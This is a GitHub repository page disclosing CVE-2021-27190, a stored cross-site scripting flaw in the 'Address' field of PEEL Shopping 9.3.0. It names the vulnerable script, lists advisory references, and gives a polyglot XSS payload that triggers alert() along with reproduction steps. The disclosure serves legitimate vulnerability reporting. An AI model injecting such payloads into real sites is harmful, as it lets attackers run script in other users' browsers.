Skip to content

anmolksachan/CVE-2021-27190-PEEL-Shopping-cart-9.3.0-Stored-XSS

main
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
Code

Latest commit

 

Git stats

Files

Permalink
Failed to load latest commit information.
Type
Name
Latest commit message
Commit time
February 12, 2021 13:02
February 11, 2021 13:23

CVE-2021-27190 - PEEL Shopping, eCommerce shopping cart - Stored Cross-Site Scripting Vulnerability in 'Address'

Watch the video

Date

2021-02-11

Exploit Author

Anmol K Sachan

Vendor Homepage

https://www.peel.fr/

Software Link

https://www.peel.fr/nos-offres-1/peel-shopping-31.html
https://sourceforge.net/projects/peel-shopping/

Vulnerable Software Link

https://drive.google.com/file/d/1dIwRdaqtEyqUUgxbRqrHiS5WQ10nEG8z/view?usp=sharing

Software: :

PEEL SHOPPING 9.3.0

Vulnerability Type

Stored Cross-site Scripting

Vulnerability

Stored XSS

Tested on Windows 10 XAMPP


CVE Assigned

CVE-2021-27190
This application is vulnerable to Stored XSS vulnerability.

Vulnerable script

http://localhost/peel-shopping_9_3_0/utilisateurs/change_params.php

https://github.com/anmolksachan/CVE-2021-27190-PEEL-Shopping-cart-9.3.0-Stored-XSS/edit/main/README.MD## Vulnerable parameters 'Address'

Payload used

jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e

POC

https://drive.google.com/file/d/1t1hksDsYqYsqryRq61tNIQQMTCFidtc1/view
In the same page where we injected payload click on the text box to edit the address.
You will see your Javascript code (XSS) executed.

Referneces

  1. https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27190
  2. https://packetstormsecurity.com/files/161367/PEEL-Shopping-9.3.0-Cross-Site-Scripting.html
  3. https://www.exploit-db.com/exploits/49553
  4. https://www.secuneus.com/cve-2021-27190-peel-shopping-ecommerce-shopping-cart-stored-cross-site-scripting-vulnerability-in-address/
  5. https://cxsecurity.com/issue/WLB-2021020054
  6. https://nvd.nist.gov/vuln/detail/CVE-2021-27190

About

No description, website, or topics provided.

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published